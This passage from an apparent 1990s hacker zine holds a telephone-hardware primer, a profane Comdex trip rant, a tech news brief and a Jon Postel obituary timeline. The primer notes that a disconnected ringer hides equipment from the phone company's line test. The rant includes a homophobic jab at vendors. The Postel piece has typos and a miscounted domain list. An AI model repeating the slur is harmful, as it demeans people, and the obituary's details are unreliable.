world, these wires may be called "A" and "B".) Most installations have another pair of wires, yellow and black. These wires can be used for many different purposes, if they are used at all. Some party lines use the yellow wire as a ground; sometimes there's 6.8 VAC on this pair to light the dials of Princess type phones. If you have two separate phone lines (not extensions) in your home, you will find the yellow and black pair carrying a second telephone line. In this case, black is "Tip" and yellow is "Ring." The above description applies to a standard line with a DC connection between your end of the line and the telephone exchange. Most phone lines in the world are of this type, known as a "metallic line." In a metallic line, there may or may not be inductance devices placed in the line to alter the frequency response of the line; the devices used to do this are called "loading coils." (Note: if they impair the operation of your modem, your telephone company can remove them.) Other types of lines are party lines, which may be metallic lines but require special telephones to allow the telephone company to differentiate between subscribers. Very long lines may have amplifiers, sometimes called "loop extenders" on them. Some telephone companies use a system called "subscriber carrier," which is basically an RF system in which your telephone signal is heterodyned up to around 100 Khz and then sent along another subscriber's "twisted pair." If you have questions about your telephone line, you can call your telephone company; depending on the company and who you can reach, you may be able to obtain a wealth of information. The Speech Network The speech network - also known as the "hybrid" or the "two wire/four wire network" - takes the incoming signal and feeds it to the earpiece and takes the microphone output and feeds it down the line. The standard network used all over the world is an LC device with a carbon microphone; some newer phones use discrete transistors or ICs. One of the advantages of an LC network is that it has no semiconductors, is not voltage sensitive, and will work continuously as the voltage across the line is reduced. Many transistorized phones stop working as the voltage approaches 3 to 4 Volts. When a telephone is taken off the hook, the line voltage drops from 48 Volts to between 9 and 3 Volts, depending on the length of the loop. If another telephone in parallel is taken off the hook, the current consumption of the line will remain the same and the voltage across the terminals of both telephones will drop. Bell Telephone specifications state that three telephones should work in parallel on a 20 mA loop; transistorized phones tend not to pass this test, although some manufacturers use ICs that will pass. Although some European telephone companies claim that phones working in parallel is "technically impossible," and discourage attempts to make them work that way, some of their telephones will work in parallel. While low levels of audio may be difficult to hear, overly loud audio can be painful. Consequently, a well designed telephone will automatically adjust its transmit and receive levels to allow for the attenuation - or lack of it - caused by the length of the loop. This adjustment is called "loop compensation." In the United States, telephone manufacturers achieve this compensation with silicon carbide varistors that consume any excess current from a short loop (see fig. 2). Although some telephones using ICs have built-in loop compensation, many do not; the latter have been designed to provide adequate volume on the average loop, which means that they provide low volume on long loops, and are too loud on short loops. Various countries have different specifications for transmit and receive levels; some European countries require a higher transmit level than is standard in the United States so a domestically-manufactured telephone may suffer from low transmit level if used on European lines without modification. Because a telephone is a duplex device, both transmitting and receiving on the same pair of wires, the speech network must ensure that not too much of the caller's voice is fed back into his or her receiver. This function, called "sidetone," is achieved by phasing the signal so that some cancellation occurs in the speech network before the signal is fed to the receiver. Callers faced with no sidetone at all will consider the phone "dead." Too little sidetone will convince callers that they're not being heard and cause them to shout, "I can hear you. Can you hear ME?" Too much sidetone causes callers to lower their voices and not be heard well at the other end of the line. A telephone on a short loop with no loop compensation will appear to have too much sidetone, and callers will lower their voices. In this case, the percentage of sidetone is the same, but as the overall level is higher the sidetone level will also be higher. The Dial There are two types of dials in use around the world. The most common one is called pulse, loop disconnect, or rotary; the oldest form of dialing, it's been with us since the 1920's. The other dialing method, more modern and much loved by Radio Amateurs is called Touch-tone, Dual Tone Multi-Frequency (DTMF) or Multi-Frequency (MF) in Europe. In the U.S. MF means single tones used for system control. Pulse dialing is traditionally accomplished with a rotary dial, which is a speed governed wheel with a cam that opens and closes a switch in series with your phone and the line. It works by actually disconnecting or "hanging up" the telephone at specific intervals. The United States standard is one disconnect per digit, so if you dial a "1," your telephone is "disconnected" once. Dial a seven and you'll be "disconnected" seven times; dial a zero, and you'll "hang up " ten times. Some countries invert the system so "1" causes ten "disconnects" and 0, one disconnect. Some add a digit so that dialing a 5 would cause six disconnects and 0, eleven disconnects. There are even some systems in which dialing 0 results in one disconnect, and all other digits are plus one, making a 5 cause six disconnects and 9, ten disconnects. Although most exchanges are quite happy with rates of 6 to 15 Pulses Per Second (PPS), the phone company accepted standard is 8 to 10 PPS. Some modern digital exchanges, free of the mechanical inertia problems of older systems, will accept a PPS rate as high as 20. Besides the PPS rate, the dialing pulses have a make/break ratio, usually described as a percentage, but sometimes as a straight ratio. The North American standard is 60/40 percent; most of Europe accepts a standard of 63/37 percent. This is the pulse measured at the telephone, not at the exchange, where it's somewhat different, having traveled through the phone line with its distributed resistance, capacitance, and inductance. In practice, the make/break ratio does not seem to affect the performance of the dial when attached to a normal loop. Bear in mind that each pulse is a switch connect and disconnect across a complex impedance, so the switching transient often reaches 300 Volts. Try not to have your fingers across the line when dialing. Most pulse dialing phones produced today use a CMOS IC and a keyboard. Instead of pushing your finger round in circles, then removing your finger and waiting for the dial to return before dialing the next digit, you punch the button as fast as you want. The IC stores the number and pulses it out at the correct rate with the correct make/break ratio and the switching is done with a high-voltage switching transistor. Because the IC has already stored the dialed number in order to pulse it out at the correct rate, it's a simple matter for telephone designers to keep the memory "alive" and allow the telephone to store, recall, and redial the Last Number Dialed (LND). This feature enables you to redial by picking up the handset and pushing just one button. Because pulse dialing entails rapid connection and disconnection of the phone line, you can "dial" a telephone that has lost its dial, by hitting the hook-switch rapidly. It requires some practice to do this with consistent success, but it can be done. A more sophisticated approach is to place a Morse key in series with the line, wire it as normally closed and send strings of dots corresponding to the digits you wish to dial. Touch tone, the most modern form of dialing, is fast and less prone to error than pulse dialing. Compared to pulse, its major advantage is that its audio band signals can travel down phone lines further than pulse, which can travel only as far as your local exchange. Touch-tone can therefore send signals around the world via the telephone lines, and can be used to control phone answering machines and computers. Pulse dialing is to touch-tone as FSK or AFSK RTTY is to Switched Carrier RTTY, where mark and space are sent by the presence or absence of DC or unmodulated RF carrier. Most Radio Amateurs are familiar with DTMF for controlling repeaters and for accessing remote and auto phone patches. Bell Labs developed DTMF in order to have a dialing system that could travel across microwave links and work rapidly with computer controlled exchanges. Each transmitted digit consists of two separate audio tones that are mixed together (see fig.3). The four vertical columns on the keypad are known as the high group and the four horizontal rows as the low group; the digit 8 is composed of 1336 Hz and 852 Hz. The level of each tone is within 3 dB of the other, (the telephone company calls this "Twist"). A complete touch-tone pad has 16 digits, as opposed to ten on a pulse dial. Besides the numerals 0 to 9, a DTMF "dial" has *, #, A, B, C, and D. Although the letters are not normally found on consumer telephones, the IC in the phone is capable of generating them. The * sign is usually called "star" or "asterisk." The # sign, often referred to as the "pound sign." is actually called an octothorpe. Although many phone users have never used these digits - they are not, after all, ordinarily used in dialing phone numbers - they are used for control purposes, phone answering machines, bringing up remote bases, electronic banking, and repeater control. The one use of the octothorpe that may be familiar occurs in dialing international calls from phones in the United States. After dialing the complete number, dialing the octothorpe lets the exchange know you've finished dialing. It can now begin routing your call; without the octothorpe, it would wait and "time out" before switching your call. When DTMF dials first came out they had complicated cams and switches for selecting the digits and used a transistor oscillator with an LC tuning network to generate the tones. Modern dials use a matrix switch and a CMOS IC that synthesizes the tones from a 3.57MHz (TV color burst) crystal. This oscillator runs only during dialing, so it doesn't normally produce QRM. Standard DTMF dials will produce a tone as long as a key is depressed. No matter how long you press, the tone will be decoded as the appropriate digit. The shortest duration in which a digit can be sent and decoded is about 100 milliseconds (ms). It's pretty difficult to dial by hand at such a speed, but automatic dialers can do it. A twelve-digit long distance number can be dialed by an automatic dialer in a little more than a second - about as long as it takes a pulse dial to send a single 0 digit. The output level of DTMF tones from your telephone should be between 0 and -12 dBm. In telephones, 0 dB is 1 miliwatt over 600 Ohms. So 0 dB is 0.775 Volts. Because your telephone is considered a 600 Ohm load, placing a voltmeter across the line will enable you to measure the level of your tones. The Ringer Simply speaking this is a device that alerts you to an incoming call. It may be a bell, light, or warbling tone. The telephone company sends a ringing signal which is an AC waveform. Although the common frequency used in the United States is 20 HZ, it can be any frequency between 15 and 68 Hz. Most of the world uses frequencies between 20 and 40 Hz. The voltage at the subscribers end depends upon loop length and number of ringers attached to the line; it could be between 40 and 150 Volts. Note that ringing voltage can be hazardous; when you're working on a phone line, be sure at least one telephone on the line is off the hook (in use); if any are not, take high voltage precautions. The telephone company may or may not remove the 48 VDC during ringing; as far as you're concerned, this is not important. Don't take chances. The ringing cadence - the timing of ringing to pause - varies from company to company. In the United States the cadence is normally 2 seconds of ringing to 4 seconds of pause. An unanswered phone in the United States will keep ringing until the caller hangs up. But in some countries, the ringing will "time out" if the call is not answered. The most common ringing device is the gong ringer, a solenoid coil with a clapper that strikes either a single or double bell. A gong ringer is the loudest signaling device that is solely phone-line powered. Modern telephones tend to use warbling ringers, which are usually ICs powered by the rectified ringing signal. The audio transducer is either a piezoceramic disk or a small loudspeaker via a transformer. Ringers are isolated from the DC of the phone line by a capacitor. Gong ringers in the United States use a 0.47 uF capacitor. Warbling ringers in the United States generally use a 1.0 uF capacitor. Telephone companies in other parts of the world use capacitors between 0.2 and 2.0 uF. The paper capacitors of the past have been replaced almost exclusively with capacitors made of Mylar film. Their voltage rating is always 250 Volts. The capacitor and ringer coil, or Zeners in a warbling ringer, constitute a resonant circuit. When your phone is hung up ("on hook") the ringer is across the line; if you have turned off the ringer you have merely silenced the transducer, not removed the circuit from the line. When the telephone company uses the ringer to test the line, it sends a low-voltage, low frequency signal down the line (usually 2 Volts at 10 Hz) to test for continuity. The company keeps records of the expected signals on your line. This is how it can tell you have added equipment to your line. If your telephone has had its ringer disconnected, the telephone company cannot detect its presence on the line. Because there is only a certain amount of current available to drive ringers, if you keep adding ringers to your phone line you will reach a point at which either all ringers will cease to ring, some will cease to ring, or some ringers will ring weakly. In the United States the phone company will guarantee to ring five normal ringers. A normal ringer is defined as a standard gong ringer as supplied in a phone company standard desk telephone. Value given to this ringer is Ringer Equivalence Number (REN) 1. If you look at the FCC registration label of your telephone, modem, or other device to be connected to the phone line, you'll see the REN number. It can be as high as 3.2, which means that device consumes the equivalent power of 3.2 standard ringers, or 0.0, which means it consumes no current when subjected to a ringing signal. If you have problems with ringing, total up your RENs; if the total is greater than 5, disconnect ringers until your REN is at 5 or below. Other countries have various ways of expressing REN, and some systems will handle no more than three of their standard ringers. But whatever the system, if you add extra equipment and the phones stop ringing, or the phone answering machine won't pick up calls, the solution is disconnect ringers until the problem is resolved. Warbling ringers tend to draw less current than gong ringers, so changing from gong ringers to warbling ringers may help you spread the sound better. Frequency response is the second criterion by which a ringer is described. In the United States most gong ringers are electromechanically resonant. They are usually resonant at 20 and 30 Hz (+&- 3 Hz). The FCC refers to this as A so a normal gong ringer is described as REN 1.0A. The other common frequency response is known as type B. Type B ringers will respond to signals between 15.3 and 68.0 Hz. Warbling ringers are all type B and some United States gong ringers are type B. Outside the United States, gong ringers appear to be non-frequency selective, or type B. Because a ringer is supposed to respond to AC waveforms, it will tend to respond to transients (such as switching transients) when the phone is hung up, or when the rotary dial is used on an extension phone. This is called "bell tap" in the United States; in other countries, it's often called "bell tinkle." While European and Asian phones tend to bell tap, or tinkle, United States ringers that bell tap are considered defective. The bell tap is designed out of gong ringers and fine tuned with bias springs. Warbling ringers for use in the United States are designed not to respond to short transients; this is usually accomplished by rectifying the AC and filtering it before it powers the IC, then not switching on the output stage unless the voltage lasts long enough to charge a second capacitor. Conclusion This brief primer describing the working parts of a telephone is intended to provide a better understanding of phone equipment. Note that most telephone regulatory agencies, including the FCC, forbid modification of anything that has been previously approved or attached to phone lines. End of text. Figures Follow . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Fig 1. The Phone Line A RELAY 200 Ohms Telephone . Subscriber ------- Exchange . ------- . TIP + ------~~~~~~~--o----------------------o | 5 H | . | | . +| | . --- | . No 22 AWG wire --- 48V DC | . up to 10 Miles Long - | . --- A RELAY | . -| 200 Ohms | . | ------- | . | ------- | . RING - ------~~~~~~~--|---------o------------o 5 H | | . Audio 2uF | 2uF | . coupling 250V --- 250V --- Capacitors --- --- | | o----- \-------- | | A RELAY Contacts | | o----- \------------------ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Fig 2. Telephone Speech Network. Simplified U.S. Standard "425B". Component Values may vary between manufacturers. Connections for Dials, Ringers etc. not shown. |-------------------| ..|...................| . | .| Sidetone balancing. | 0.047uF 250V .| impedance & loop . | | | .| compensation. >>> . o----| |-------o .| . | | | | .| . | | .| . | |<| VR2 | .| . o----| |-------o---.| . | |>| |.| . | |.| . | 68 Ohms |.| . o---\/\/\/-----| |.| ..|..............|..|.| | | | | | . | | | -----)||(------|---------o (GN) 1)||(5 | | | | Loop )||( | | | | TIP Compensation 2)||(6 | | | | o------ \------o---------)||(------o | | RX O . | (RR) . || | | | | . | || 1.5uF | | | | . \ 180 || --- | | | . / Ohms || --- | |----o (R) . \ || 250V | | | . | || | | | . VR1 --- . || . | | | . ^ ^ ----)||(------o--- TX O . --- | 3)||(7 | . | | )||( | RING . | (C) | 4)||(8 22 Ohms | o----- \-------o---------)||(---o----/\/\/---o (B) | | ^ | | Hookswitch ------------ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Fig. 3. Standard DTMF pad and Frequencies (Low ____ ____ ____ ____ Group)| | | | | | | | 697Hz >| 1 | | 2 | | 3 | | A | |____| |____| |____| |____| ____ ____ ____ ____ | | | | | | | | 770Hz >| 4 | | 5 | | 6 | | B | |____| |____| |____| |____| ____ ____ ____ ____ | | | | | | | | 825Hz >| 7 | | 8 | | 9 | | C | |____| |____| |____| |____| ____ ____ ____ ____ | | | | | | | | 941Hz >| * | | 0 | | # | | D | |____| |____| |____| |____| ^ ^ ^ ^ 1209Hz 1336Hz 1477Hz 1633Hz (High Group) ===================================EOF=========================================== %%%%%%%%%%%%%%%%%%%%%%%% \ Trip to Comdex \- %%%%%%%%%%%%%%%%%%%%%%%% This is my RANT on Comdex. If you have a problem with it "please direct it to that brick wall over there..." Comdex 98 fuckin SUCKED! DAY 1 Since things didn't go as planned I'll just give you a synopsis on what went on the first day. We started off (at 4:00 AM) going to pick up aphex, and lasik, but it turns out that they left on their own. So Calico, XiT, nhilisis, and I hauled ass to Vegas ourselves. We spend 5hrs in the worlds largest fucken oven. When at last we arrived at Vegas we checked into the Mirage hotel, and were bound for the Las Vegas Convention center at which Comdex was held. Finding a parking space was fucken hell. We ended up parking about 1mile away from the registration tent. Once we got in we exhaustedly spent a lot of the afternoon at the test center. We tested various devices one of the mechanisms being the new Bay Stack 450 switch, and then spent some time setting up slackware 3.4 on all the subordinate half assed windows systems. After fucking around with the computers for awhile we met up with psychosis, and a a rep from ZDNET for an interview. Then a little later we checked out all the different booths (taking all the free shit we could get.) Then we checked out the redhat booth (XiT took a copy of redhat 5.2 which was later eventually used to simulate an imatation of a UFO ) soon afterward we headed to the UUNET Technologies booth. After hanging with the folks at UUNET we headed back to the redhat linux booth to laugh at the venders(they were sporting homosexual little redish sherlock holmes hats. Damn commie bastards) after poking fun we went over to the FreeBsd booth. someone recognized the "Legions Interactive" (LoU) on the name tags and gave us some BSD shirts(which were otherwise $16, and a total rip off). We got tired of walking around all day so we took a break. While we were kicking back Calico decides to go fucken camera crazy and starts flashing snap shots like he was fucken filming a model. At any rate the camera got taken away by some fuck nut security guard who didn't want to be filmed. We argued with the asshole for about 10minutes before we resolved that it was a no win predicament so we took off. Most of the Comdex footage we got was on the other role of film. Whatever we ended up with is posted below. And so concludes this years trip to Comdex. We'll be back next year. Hopefully next year more members can tag along (and don't "inadvertently" leave without letting anyone know). http://www.t00ned.org/optik/comdex ===================================EOF=========================================== %%%%%%%%%%%%%%%%%%%%%%%% \ In the News \- %%%%%%%%%%%%%%%%%%%%%%%% **************|-* * Network (mordern advances) **************|-* ----------------------------------------------------- Lucent Supports Novell's Directory ----------------------------------------------------- Novell Inc., looking to solidify its position in directory services before Microsoft Corp. Enters the market, last week continued to push its network management technology and lined Up with what might be the first of many big time network equipment suppliers to back its Offerings. Novell, at last week's networld+Interop conference, entered into a partnership With Lucent Technologies Inc., under which the communications equipment manufacturer will use Novell Directory Services (NDS) to increase policy based network controls in its high capacity Cajun P550 Switch. ----------------------------------------------------- Jon Postel: Internet Architect and Caretaker ----------------------------------------------------- To have known him was a reverence Our condolences go out to Jon's family. -Legions Interactive - LoU ----------------------------------------------------- [Brief History] Jonathan B. Postel was a tantrum computer scientist who played a central role in developing and maintaining many of the Internets core technologies. Pastel who was 55 when he did in Oct was part of the team of engineers that in 1969, created the software for ARPAnet, the military research network that evolved into the Internet. He was best known for his role as head of the Internet Assigned Numbers Authority, the technical body that has overseen the Internet's Domain Name System (DNS) and allocated Internet Protocol (IP) addresses, the fundamental technologies for navigating and routing on the Net. Over the past two years, Postel and the IANA (www.iana.org) were in the midst of the stormy debate over the future of domain names. In 1996 Postel led an effort to introduce new top-level domains to the Internet, a proposal that attracted so much attention and resulted in such discord that the U.S. government which ahs legally retained authority over the Domain Name System- Intervened last year as an arbiter. Although he grew to notoriety through, IANA, Postel's more enduring contributions to the Internet are his technical achievements in helping to create and document the Internet's underlying technologies, including IP, and DNS. Short Time Line-- 1969- Jon Postel assists in the installation of the ARPAnet's first communications switch. 1984- A group of engineers agrees upon seven so-called top-level domains reflecting their respective use: .gov, .net, .com, .org, edu, and .int. 1985- the first domain registered is symbolics.com on March 15 1988- The Internet Assigned Numbers Authority is started in December. Postel is appointed Director. The organization allocates blocks of Internet addresses to interested organizations. 1993- NSF requests proposals to run the .com, .net, .org, and .gov dns services known as InterNIC. The contract is awarded to Network Solutions Inc. 1996- Postel proposes to the Internet society that new top-level domains be created. Each of 50 registries would administer three of the new domains. 1998- Postel "redirects" five of the 12 Internet directory servers to get data about where every domain name in the world is located from his machine at the University or Southern California, rather than from a server at NSI's Virginia headquarters. The test was initiated without warning NSI or the government. That's it for this now... Check ya in kv6 ------------------------------------------------------------------------------ ______________________ / Distro Sites / /_____K______V________/ Official Distro Site: http://www.legions.org/kv.html Packet Storm Security: http://www.genocide2600.com/~tattooman/keen/ Hackers Hideout: http://hackersclub.com/km/magazines/lou/ Cyberdelia: http://www.rat.pp.se/hotel/cyberdelia/files/zines/kv/ Real Secure: http://www.real-secure.org/zine/docs/kv/ Merely An Illusion: http://www.t00ned.org/optik/kv want to be a distro site? want to write articles? Email webmaster@legions.org